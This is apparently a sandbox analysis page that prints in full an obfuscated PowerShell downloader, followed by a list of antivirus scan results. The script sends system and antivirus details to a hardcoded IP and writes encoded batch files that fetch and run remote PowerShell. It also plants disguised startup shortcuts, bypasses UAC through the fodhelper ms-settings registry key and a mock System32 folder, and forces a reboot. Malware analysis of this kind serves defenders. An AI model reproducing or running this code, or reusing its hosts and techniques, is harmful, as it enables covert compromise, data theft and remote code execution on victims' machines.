popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

No static analysis available.
function ____///////// {
[cmdletBinding()]
param (
[string]$ComputerName = "$env:computername" ,
$Credential
BEGIN
{
$wmiQuery = "SELECT * FROM AntiVirusProduct"
}
PROCESS
{ $AntivirusProduct = Get-WmiObject -Namespace "root\SecurityCenter2" -Query $wmiQuery @psboundparameters
$AntivirusNames = $AntivirusProduct.displayName
$lang = Get-Culture
$lang = $lang.displayname
$winds = (Get-WmiObject -class Win32_OperatingSystem).Caption
if($env:PROCESSOR_ARCHITECTURE -eq "x86"){ $Bits =" 32-Bit CPU "}Else{ $Bits =" 64-Bit CPU "}
$WebRequest = [System.Net.WebRequest]::Create(([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('aAB0AHQAcAA6AC8ALwA5ADQALgAxADMAMQAuADEAMQA3AC4ANwAyAC8AbABkAGgAdAAvAGkAbgBkAGUAeAAuAHAAaABwAA=='))))
$GlobalListStr = [System.Text.Encoding]::UTF8.GetBytes("AT= $env:USERNAME $env:computername $winds $AntivirusNames $lang $Bits ")
$WebRequest.Method = 'POST'
$WebRequest.ContentType = 'application/x-www-form-urlencoded'
$WebRequest.ContentLength = $GlobalListStr.length
$RequestStream = $WebRequest.GetRequestStream()
$RequestStream.Write($GlobalListStr, 0, $GlobalListStr.length)
$RequestStream.Close()
}
END {
}
${_/|\_/|////\__|/_|\\_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YwBtAGQA')))
${_/|\_/|////\__|/_|\\\\\\/|_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('ZQB4AGUA')))
${__///\\\} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LgBwAG4AZwA=')))
${_/|\_/|////\__|/_|\\\\\\/\\\\/\/\/\|_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('egBpAHAA')))
${_/|\_/|////\__|//\\\\\\\\/|_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('')))
${_/|_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YwA6AFwAdQBzAGUAcgBzAFwA')))
${_/|\_/|/\\\\\\\/|_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cAB1AGIAbABpAGMA')))
${_/|_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YwA6AFwAdQBzAGUAcgBzAFwA')))
${_\\\\\\/|\_/|/\\\\\\\/|_} = "${_/|_}${_/|\_/|/\\\\\\\/|_}"
${_\\/\/\/\/\/\/\/\////\\\//\/\/\/\//_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RwBsAG8AYgBhAGwA')))
${_\\/\/\/\/\/\/\/\////\\\//\/\/\/\////_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABsAGwAQwBhAGwAbAA=')))
${_\\/\/\/\/\/\/\/\////\\\//\/\/\/\////\\\_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UwBUAFIAVQBDAFQA')))
${_\\/\/\/\/\/\/\/\////\\\//\/\/\/\///////\\\_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SgBMAEkAXwBHAGUAdABTAHQAZABBAHIAZwBjAA==')))
${_\\/\/\//\/\\/\/\/\/\////\\\//\/\/\/\///////\\\_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABsAGwATwBwAGUAbgA=')))
${_\\/\/\//\/\\/\/\/\/\\\\\////\\\//\/\/\/\///////\\\_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('IwBOAG8AVAByAGEAeQBJAGMAbwBuAA==')))
${_um_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBsAGEAcwBzAGUAcwBcAG0AcwAtAHMAZQB0AHQAaQBuAGcAcwBcAFMAaABlAGwAbABcAE8AcABlAG4AXABjAG8AbQBtAGEAbgBkAA==')))
${_dois_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('SABLAEMAVQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwAQwBsAGEAcwBzAGUAcwBcAG0AcwAtAHMAZQB0AHQAaQBuAGcAcwBcAFMAaABlAGwAbABcAE8AcABlAG4AXABjAG8AbQBtAGEAbgBkACIAIAAtAE4AYQBtAGUAIAAiAEQAZQBsAGUAZwBhAHQAZQBFAHgAZQBjAHUAdABlACIAIAAtAFYAYQBsAHUAZQAgACIA')))
${_tres_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('RABlAGwAZQBnAGEAdABlAEUAeABlAGMAdQB0AGUA')))
${_qtro_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('KABkAGUAZgBhAHUAbAB0ACkA')))
${_fiv_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwA6AFwAVwBpAG4AZABvAHcAcwBcAFMAeQBzAHQAZQBtADMAMgBcAGYAbwBkAGgAZQBsAHAAZQByAC4AZQB4AGUA')))
${_six_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('ZgBvAGQAaABlAGwAcABlAHIALgBlAHgAZQA=')))
${_sev_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('XABcAD8AXABDADoAXABXAGkAbgBkAG8AdwBzACAAXABTAHkAcwB0AGUAbQAzADIAXAA=')))
${_\\\} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('MQBuACAAaQBhAA==')))
${_\\///////////////////////_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('QwA6AFwA')))
${_tx_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LgB0AHgAdAA=')))
${_dx_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LgBkAGwAbAA=')))
${_ex_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('LgBlAHgAZQA=')))
${_jl_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('agBsAGkA')))
${_ms_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBTAFYAQwBSADEAMAAwAA==')))
${_wb_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('VwBlAGIAVgBpAGUAdwAyAEwAbwBhAGQAZQByAA==')))
${_\\\\\\/|\\\\\\\\\\\\\\\\\_} = $env:COMPUTERNAME
${/////\\\\\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/} = "L21"
Function ____////////\\\/\/\/\/\_____ {
${_|||||||||||||________________} = "q","w","e","r","t","y","u","p","a","s","d","f","g","h","j","k","z","x","c","v","b","n","m"
${_|||||||||||||//////________________} = "2_","3_","4_","5_","6_","7_","8_","9_"
${_|||||||||||||//////\\\\\________________} = $null
${__|||||||||||||//////\\\\\________________} = Get-Random -InputObject ${_|||||||||||||________________} -Count 6
${__||||||_|||||||//////\\\\\________________} = Get-Random -InputObject ${_|||||||||||||//////________________} -Count 1
${__||||||_||||||_|//////\\\\\________________} = Get-Random -InputObject ${_|||||||||||||________________}.ToUpper() -Count 1
foreach($n in ${__|||||||||||||//////\\\\\________________}) {
${_|||||||||||||//////\\\\\________________} += $n
foreach ($n2 in ${__||||||_|||||||//////\\\\\________________}) {
${_|||||||||||||//////\\\\\________________} += $n2
foreach ($n3 in ${__||||||_||||||_|//////\\\\\________________}) {
${_|||||||||||||//////\\\\\________________} += $n3
return "_${_|||||||||||||//////\\\\\________________}"
${_\\\\\\/|\_/|/\\\___\\\\/|_} = ____////////\\\/\/\/\/\_____
${GER} = ${_\\\\\\/|\_/|/\\\___\\\\/|_}
${/\/\/\/\__\\//___} = "@14@12@17@24 @18@14@33 (@23@14@32-@24@11@19@14@12@29 @23@14@29.@32@14@11@12@21@18@14@23@29).@13@24@32@23@21@24@10@13@28@29@27@18@23@16('@17@29@29@25@28://@15@28@23@10@29.@28@17@24@25/@10/@0@8/@1@5@0@8@2@2/@30@25/@30@25') | @25@24@32@14@27@28@17@14@21@21.@14@33@14 -@23@24@25 -@32@18@23 @1 -"
${_\\\\\__\/|\_/|/\\\___\\\\/|_} = "${_\\\\\\/|\_/|/\\\\\\\/|_}\${/////\\\\\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/}"
if ((${_\\\\\__\/|\_/|/\\\___\\\\/|_} | Test-Path)) {exit}
____/////////
New-Item -ItemType directory -Path "${_\\///////////////////////_}${_\\\\\\/|\_/|/\\\___\\\\/|_}"
$folderPath = "${_\\///////////////////////_}${_\\\\\\/|\_/|/\\\___\\\\/|_}"
if (Test-Path -Path $folderPath -PathType Container) {
} else {
${_\\///////////////////////_} = "${_/|_}${_/|\_/|/\\\\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}"
New-Item -ItemType directory -Path "${_\\///////////////////////_}"
${_\\///////////////////////_} = "${_/|_}${_/|\_/|/\\\\\\\/|_}\"
${//////////____zz//} = "${_\\///////////////////////_}${_\\\\\\/|\_/|/\\\___\\\\/|_}\${_\\\\\\/|\\\\\\\\\\\\\\\\\_}"
${ZZZZxxxx_} = ${/\/\/\/\__\\//___}
${ZZZZxxxx_} | Set-Content ${//////////____zz//}${GER}
${\\/_} = (${_\\\\\\/|\_/|/\\\___\\\\/|_})
${\\/////\} = (${_\\\\\\/|\_/|/\\\___\\\\/|_} + "A")
${/\} = (${_\\\\\\/|\_/|/\\\___\\\\/|_} + "B")
del ${_\\\\\\/|\_/|/\\\\\\\/|_}\*.vbs
del ${_\\\\\\/|\_/|/\\\\\\\/|_}\*.lnk
del ${_\\\\\\/|\_/|/\\\\\\\/|_}\*.exe
del ${_\\\\\\/|\_/|/\\\\\\\/|_}\*.cmd
${/_//_//_/} = "${_\\\\\\/|\_/|/\\\\\\\/|_}\${_\\\\\\/|\\\\\\\\\\\\\\\\\_}${GER}.${_/|\_/|////\__|/_|\\_}"
${\\\\__/////////} = "@Echo off`r`n"
${\\\\__/////////} += "Setlocal EnableExtensions`r`n"
${\\\\__/////////} += "Setlocal EnableDelayedExpansion`r`n"
${\\\\__/////////} += "cd %SystemRoot%\System32`r`n"
${\\\\__/////////} += "Set /P ${_\\\\\\/|\_/|/\\\___\\\\/|_}=<`"${//////////____zz//}${GER}`"`r`n"
${\\\\__/////////} += "set chars=0123456789abcdefghijklmnopqrstuvwxyz`r`n"
${\\\\__/////////} += "for /L %%N in (10 1 36) do (`r`n"
${\\\\__/////////} += "for /F %%C in (`"!chars:~%%N,1!`") do (`r`n"
${\\\\__/////////} += "set `"${_\\\\\\/|\_/|/\\\___\\\\/|_}=!${_\\\\\\/|\_/|/\\\___\\\\/|_}:%%N=%%C!`"`r`n"
${\\\\__/////////} += ")`r`n"
${\\\\__/////////} += ")`r`n"
${\\\\__/////////} += ")`r`n"
${\\\\__/////////} += "for /F %%F in (`"!${_\\\\\\/|\_/|/\\\___\\\\/|_}!`") do (`r`n"
${\\\\__/////////} += "set `"${_\\\\\\/|\_/|/\\\___\\\\/|_}=!${_\\\\\\/|\_/|/\\\___\\\\/|_}:@=!`"`r`n"
${\\\\__/////////} += ")`r`n"
${\\\\__/////////} += "for /F %%F in (`"!${_\\\\\\/|\_/|/\\\___\\\\/|_}!`") do (`r`n"
${\\\\__/////////} += "set `"${_\\\\\\/|\_/|/\\\___\\\\/|_}=!${_\\\\\\/|\_/|/\\\___\\\\/|_}:`"=!`"`r`n"
${\\\\__/////////} += ")`r`n"
${\\\\__/////////} += "%${_\\\\\\/|\_/|/\\\___\\\\/|_}%`r`n"
${\\\\__/////////} | Set-Content ${/_//_//_/}
function _____/\_/\/\_/\/=\\\\\\\\\\/////
Param([string]${___/\_/=\___/\_/==},[string]${__/==\/\_/\/=\/\_/});
try{
${__/\_/=\/=\/=====} = New-Object -ComObject WScript.Shell
${/=\/\__/=\/=\/=\_} = ${__/\_/=\/=\/=====}.CreateShortcut(${___/\_/=\___/\_/==})
${/=\/\__/=\/=\/=\_}.TargetPath = "${_\\///////////////////////_}${_\\\\\\/|\_/|/\\\___\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}.${_/|\_/|////\__|/_|\\\\\\/|_}"
${/=\/\__/=\/=\/=\_}.Arguments = "${_\\///////////////////////_}${_\\\\\\/|\_/|/\\\___\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}.ai"
${/=\/\__/=\/=\/=\_}.WorkingDirectory = "${_\\///////////////////////_}${_\\\\\\/|\_/|/\\\___\\\\/|_}\"
${/=\/\__/=\/=\/=\_}.WindowStyle = 7
${/=\/\__/=\/=\/=\_}.IconLocation = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JQBQAHIAbwBnAHIAYQBtAEYAaQBsAGUAcwAlAFwASQBuAHQAZQByAG4AZQB0ACAARQB4AHAAbABvAHIAZQByAFwAaQBlAHgAcABsAG8AcgBlAC4AZQB4AGUALAAxAA==')))
${/=\/\__/=\/=\/=\_}.Save()
}finally{}
function _____/\_/\/\_/\/=\\\\\\\\\\/////\\\\\\\\\\\\\\\\\\\\\\\
Param([string]${___/\_/=\___/\_/==},[string]${__/==\/\_/\/=\/\_/});
try{
${__/\_/=\/=\/=====} = New-Object -ComObject WScript.Shell
${/=\/\__/=\/=\/=\_} = ${__/\_/=\/=\/=====}.CreateShortcut(${___/\_/=\___/\_/==})
${/=\/\__/=\/=\/=\_}.TargetPath = "${_\\///////////////////////_}${_\\\\\\/|\_/|/\\\___\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}.${_/|\_/|////\__|/_|\\\\\\/|_}"
${/=\/\__/=\/=\/=\_}.Arguments = "${_\\///////////////////////_}${_\\\\\\/|\_/|/\\\___\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}.at"
${/=\/\__/=\/=\/=\_}.WorkingDirectory = "${_\\///////////////////////_}${_\\\\\\/|\_/|/\\\___\\\\/|_}\"
${/=\/\__/=\/=\/=\_}.WindowStyle = 7
${/=\/\__/=\/=\/=\_}.IconLocation = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JQBQAHIAbwBnAHIAYQBtAEYAaQBsAGUAcwAlAFwASQBuAHQAZQByAG4AZQB0ACAARQB4AHAAbABvAHIAZQByAFwAaQBlAHgAcABsAG8AcgBlAC4AZQB4AGUALAAxAA==')))
${/=\/\__/=\/=\/=\_}.Save()
}finally{}
function _____/\_/\/\_/\/=\\\\\\\\\\/////\\\\\\\\\\\\\\\\\\\\\\\///////////////////////
Param([string]${___/\_/=\___/\_/==},[string]${__/==\/\_/\/=\/\_/});
try{
${__/\_/=\/=\/=====} = New-Object -ComObject WScript.Shell
${/=\/\__/=\/=\/=\_} = ${__/\_/=\/=\/=====}.CreateShortcut(${___/\_/=\___/\_/==})
${/=\/\__/=\/=\/=\_}.TargetPath = "${_\\///////////////////////_}${_\\\\\\/|\_/|/\\\___\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}.${_/|\_/|////\__|/_|\\\\\\/|_}"
${/=\/\__/=\/=\/=\_}.Arguments = "${_\\///////////////////////_}${_\\\\\\/|\_/|/\\\___\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}.bai"
${/=\/\__/=\/=\/=\_}.WorkingDirectory = "${_\\///////////////////////_}${_\\\\\\/|\_/|/\\\___\\\\/|_}\"
${/=\/\__/=\/=\/=\_}.WindowStyle = 7
${/=\/\__/=\/=\/=\_}.IconLocation = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JQBQAHIAbwBnAHIAYQBtAEYAaQBsAGUAcwAlAFwASQBuAHQAZQByAG4AZQB0ACAARQB4AHAAbABvAHIAZQByAFwAaQBlAHgAcABsAG8AcgBlAC4AZQB4AGUALAAxAA==')))
${/=\/\__/=\/=\/=\_}.Save()
}finally{}
${TESTE} = "${_sev_}"
New-Item ${TESTE} -ItemType Directory
Copy-Item -Path "${_fiv_}" -Destination "${TESTE}${_six_}" -Recurse
function _____/\_/\/\_/\/=\\\\\\\\\\/////\\\\\\\\\\\\\\\\\\\\\\\____\\\
Param([string]${___/\_/=\___/\_/==},[string]${__/==\/\_/\/=\/\_/});
try{
${__/\_/=\/=\/=====} = New-Object -ComObject WScript.Shell
${/=\/\__/=\/=\/=\_} = ${__/\_/=\/=\/=====}.CreateShortcut(${___/\_/=\___/\_/==})
${/=\/\__/=\/=\/=\_}.TargetPath = "${_\\///////////////////////_}${_\\\\\\/|\_/|/\\\___\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}i7${_ex_}"
${/=\/\__/=\/=\/=\_}.Arguments = ""
${/=\/\__/=\/=\/=\_}.WorkingDirectory = "${_\\///////////////////////_}"
${/=\/\__/=\/=\/=\_}.WindowStyle = 7
${/=\/\__/=\/=\/=\_}.IconLocation = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JQBQAHIAbwBnAHIAYQBtAEYAaQBsAGUAcwAlAFwASQBuAHQAZQByAG4AZQB0ACAARQB4AHAAbABvAHIAZQByAFwAaQBlAHgAcABsAG8AcgBlAC4AZQB4AGUALAAxAA==')))
${/=\/\__/=\/=\/=\_}.Save()
}finally{}
function _____/\_/\/\_/\/=\
Param([string]${___/\_/=\___/\_/==},[string]${__/==\/\_/\/=\/\_/});
try{
${__/\_/=\/=\/=====} = New-Object -ComObject WScript.Shell
${/=\/\__/=\/=\/=\_} = ${__/\_/=\/=\/=====}.CreateShortcut(${___/\_/=\___/\_/==})
${/=\/\__/=\/=\/=\_}.TargetPath = "${/_//_//_/}"
${/=\/\__/=\/=\/=\_}.Arguments = ""
${/=\/\__/=\/=\/=\_}.WorkingDirectory = ""
${/=\/\__/=\/=\/=\_}.WindowStyle = 7
${/=\/\__/=\/=\/=\_}.IconLocation = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JQBQAHIAbwBnAHIAYQBtAEYAaQBsAGUAcwAlAFwASQBuAHQAZQByAG4AZQB0ACAARQB4AHAAbABvAHIAZQByAFwAaQBlAHgAcABsAG8AcgBlAC4AZQB4AGUALAAxAA==')))
${/=\/\__/=\/=\/=\_}.Save()
}finally{}
${/===\__/=\_/==\_/} = New-Object -Com WScript.Shell
${/=\_/\_/===\/\/\/} = ${/===\__/=\_/==\_/}.SpecialFolders.Item($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cwB0AGEAcgB0AHUAcAA='))));
del ${/=\_/\_/===\/\/\/}\*.vbs
del ${/=\_/\_/===\/\/\/}\*.lnk
del ${/=\_/\_/===\/\/\/}\*.exe
del ${/=\_/\_/===\/\/\/}\*.cmd
${_/=\/=\/\_/\/=\__} = " $env:APPDATA\${_/=\/\/=\___/\/==}, ${_/\/\/\/=\/==\__/}"
${___/\_/\/===\/\__} = "${/=\_/\_/===\/\/\/}\${_\\\\\\/|\_/|/\\\___\\\\/|_}.lnk"
_____/\_/\/\_/\/=\ ${___/\_/\/===\/\__} ${_/=\/=\/\_/\/=\__}
#${___/\_/\/===\/\__} = "${/=\_/\_/===\/\/\/}\${_\\\\\\/|\_/|/\\\___\\\\/|_}EX.lnk"
#_____/\_/\/\_/\/=\\\\\\\\\\///// ${___/\_/\/===\/\__} ${_/=\/=\/\_/\/=\__}
#${___/\_/\/===\/\__} = "${/=\_/\_/===\/\/\/}\${_\\\\\\/|\_/|/\\\___\\\\/|_}AT.lnk"
#_____/\_/\/\_/\/=\\\\\\\\\\/////\\\\\\\\\\\\\\\\\\\\\\\ ${___/\_/\/===\/\__} ${_/=\/=\/\_/\/=\__}
#${___/\_/\/===\/\__} = "${/=\_/\_/===\/\/\/}\${_\\\\\\/|\_/|/\\\___\\\\/|_}bt.lnk"
#_____/\_/\/\_/\/=\\\\\\\\\\/////\\\\\\\\\\\\\\\\\\\\\\\/////////////////////// ${___/\_/\/===\/\__} ${_/=\/=\/\_/\/=\__}
${___/\_/\/===\/\__} = "${/=\_/\_/===\/\/\/}\${_\\\\\\/|\_/|/\\\___\\\\/|_}AA.lnk"
_____/\_/\/\_/\/=\\\\\\\\\\/////\\\\\\\\\\\\\\\\\\\\\\\____\\\ ${___/\_/\/===\/\__} ${_/=\/=\/\_/\/=\__}
${/\/\/\/\__\\//___} = "@14@12@17@24 @18@14@33 (@23@14@32-@24@11@19@14@12@29 @23@14@29.@32@14@11@12@21@18@14@23@29).@13@24@32@23@21@24@10@13@28@29@27@18@23@16('@17@29@29@25@28://@15@28@23@10@29.@28@17@24@25/@10/@0@8/@1@5@0@8@2@2/@10@30/@10@30') | @25@24@32@14@27@28@17@14@21@21.@14@33@14 -@23@24@25 -@32@18@23 @1 -"
${_\\\\\\/|\_/|/\\\___\\\\/|_} = ${_\\\\\\/|\_/|/\\\___\\\\/|_}
${//////////____zz//} = "${_\\///////////////////////_}${_\\\\\\/|\_/|/\\\___\\\\/|_}\${_\\\\\\/|\\\\\\\\\\\\\\\\\_}"
${ZZZZxxxx_} = ${/\/\/\/\__\\//___}
${ZZZZxxxx_} | Set-Content ${//////////____zz//}${GER}y
${\\/_} = (${_\\\\\\/|\_/|/\\\___\\\\/|_})
${\\/////\} = (${_\\\\\\/|\_/|/\\\___\\\\/|_} + "A")
${/\} = (${_\\\\\\/|\_/|/\\\___\\\\/|_} + "B")
${/_//_//_/} = "${_\\\\\\/|\_/|/\\\\\\\/|_}\${_\\\\\\/|\\\\\\\\\\\\\\\\\_}${GER}y.${_/|\_/|////\__|/_|\\_}"
${\\\\__/////////} = "@Echo off`r`n"
${\\\\__/////////} += "Setlocal EnableExtensions`r`n"
${\\\\__/////////} += "Setlocal EnableDelayedExpansion`r`n"
${\\\\__/////////} += "cd %SystemRoot%\System32`r`n"
${\\\\__/////////} += "Set /P ${_\\\\\\/|\_/|/\\\___\\\\/|_}=<`"${//////////____zz//}${GER}y`"`r`n"
${\\\\__/////////} += "set chars=0123456789abcdefghijklmnopqrstuvwxyz`r`n"
${\\\\__/////////} += "for /L %%N in (10 1 36) do (`r`n"
${\\\\__/////////} += "for /F %%C in (`"!chars:~%%N,1!`") do (`r`n"
${\\\\__/////////} += "set `"${_\\\\\\/|\_/|/\\\___\\\\/|_}=!${_\\\\\\/|\_/|/\\\___\\\\/|_}:%%N=%%C!`"`r`n"
${\\\\__/////////} += ")`r`n"
${\\\\__/////////} += ")`r`n"
${\\\\__/////////} += ")`r`n"
${\\\\__/////////} += "for /F %%F in (`"!${_\\\\\\/|\_/|/\\\___\\\\/|_}!`") do (`r`n"
${\\\\__/////////} += "set `"${_\\\\\\/|\_/|/\\\___\\\\/|_}=!${_\\\\\\/|\_/|/\\\___\\\\/|_}:@=!`"`r`n"
${\\\\__/////////} += ")`r`n"
${\\\\__/////////} += "for /F %%F in (`"!${_\\\\\\/|\_/|/\\\___\\\\/|_}!`") do (`r`n"
${\\\\__/////////} += "set `"${_\\\\\\/|\_/|/\\\___\\\\/|_}=!${_\\\\\\/|\_/|/\\\___\\\\/|_}:`"=!`"`r`n"
${\\\\__/////////} += ")`r`n"
${\\\\__/////////} += "%${_\\\\\\/|\_/|/\\\___\\\\/|_}%`r`n"
${\\\\__/////////} | Set-Content ${/_//_//_/}
function _____/\_/\/\_/\/=\//
Param([string]${___/\_/=\___/\_/==},[string]${__/==\/\_/\/=\/\_/});
try{
${__/\_/=\/=\/=====} = New-Object -ComObject WScript.Shell
${/=\/\__/=\/=\/=\_} = ${__/\_/=\/=\/=====}.CreateShortcut(${___/\_/=\___/\_/==})
${/=\/\__/=\/=\/=\_}.TargetPath = "${/_//_//_/}"
${/=\/\__/=\/=\/=\_}.Arguments = ""
${/=\/\__/=\/=\/=\_}.WorkingDirectory = ""
${/=\/\__/=\/=\/=\_}.WindowStyle = 7
${/=\/\__/=\/=\/=\_}.IconLocation = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JQBQAHIAbwBnAHIAYQBtAEYAaQBsAGUAcwAlAFwASQBuAHQAZQByAG4AZQB0ACAARQB4AHAAbABvAHIAZQByAFwAaQBlAHgAcABsAG8AcgBlAC4AZQB4AGUALAAxAA==')))
${/=\/\__/=\/=\/=\_}.Save()
}finally{}
${/===\__/=\_/==\_/} = New-Object -Com WScript.Shell
${/=\_/\_/===\/\/\/} = ${/===\__/=\_/==\_/}.SpecialFolders.Item($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('cwB0AGEAcgB0AHUAcAA='))));
${_/=\/=\/\_/\/=\__} = " $env:APPDATA\${_/=\/\/=\___/\/==}, ${_/\/\/\/=\/==\__/}"
${___/\_/\/===\/\__} = "${/=\_/\_/===\/\/\/}\${_\\\\\\/|\_/|/\\\___\\\\/|_}y.lnk"
_____/\_/\/\_/\/=\// ${___/\_/\/===\/\__} ${_/=\/=\/\_/\/=\__}
${_/\/\/\__\\\\\\\|||\/\/_} = ${_\\\\\\/|\_/|/\\\___\\\\/|_}
${_/\/\/\__\\\\\\\|||\/\/_} | Set-Content "${_\\\\\\/|\_/|/\\\\\\\/|_}\${/////\\\\\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/}"
${_/\/\/\__\\\\\\\|||\/\/_} | Out-File "${_\\\\\\/|\_/|/\\\\\\\/|_}\${/////\\\\\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/}"
${_/\/\/\__\\\\\\\|||\/\/_} > "${_\\\\\\/|\_/|/\\\\\\\/|_}\${/////\\\\\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/}"
New-Item "${_um_}" -Force
New-ItemProperty -Path "${_um_}" -Name "${_tres_}" -Value "" -Force
Set-ItemProperty -Path "${_um_}" -Name "${_qtro_}" -Value "${_\\///////////////////////_}${_\\\\\\/|\_/|/\\\___\\\\/|_}\${_\\\\\\/|\_/|/\\\___\\\\/|_}i7${_ex_}" -Force
shutdown /r /t 15
Antivirus Signature
Bkav Clean
Lionic Clean
tehtris Clean
ClamAV Win.Trojan.PowerMacro-5942596-0
CMC Clean
CAT-QuickHeal Clean
Skyhigh Clean
ALYac Clean
Malwarebytes Clean
Zillya Clean
Sangfor Trojan.Generic-Script.Save.6d8eeaf9
K7AntiVirus Clean
K7GW Clean
Cybereason Clean
Baidu Clean
VirIT Clean
Symantec Clean
ESET-NOD32 PowerShell/RiskWare.Agent.U
TrendMicro-HouseCall Clean
Avast PwrSh:Downloader-BH [Trj]
Cynet Malicious (score: 99)
Kaspersky Clean
BitDefender Heur.BZC.PZQ.Boxter.231.CBECF13B
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Heur.BZC.PZQ.Boxter.231.CBECF13B
Tencent Clean
Sophos Troj/PSDl-VV
F-Secure Trojan.TR/PShell.Dldr.VPJ
DrWeb Clean
VIPRE Heur.BZC.PZQ.Boxter.231.CBECF13B
TrendMicro Clean
FireEye Heur.BZC.PZQ.Boxter.231.CBECF13B
Emsisoft Heur.BZC.PZQ.Boxter.231.CBECF13B (B)
GData Heur.BZC.PZQ.Boxter.231.CBECF13B
Jiangmin Clean
Varist PSH/Agent.LF
Avira TR/PShell.Dldr.VPJ
MAX malware (ai score=84)
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Heur.BZC.PZQ.Boxter.231.CBECF13B
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft Clean
Google Detected
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
TACHYON Clean
VBA32 Clean
Zoner Clean
Rising Clean
Yandex Clean
Ikarus Clean
MaxSecure Clean
Fortinet Clean
BitDefenderTheta Clean
AVG PwrSh:Downloader-BH [Trj]
Panda Clean
CrowdStrike Clean
alibabacloud Clean
No IRMA results available.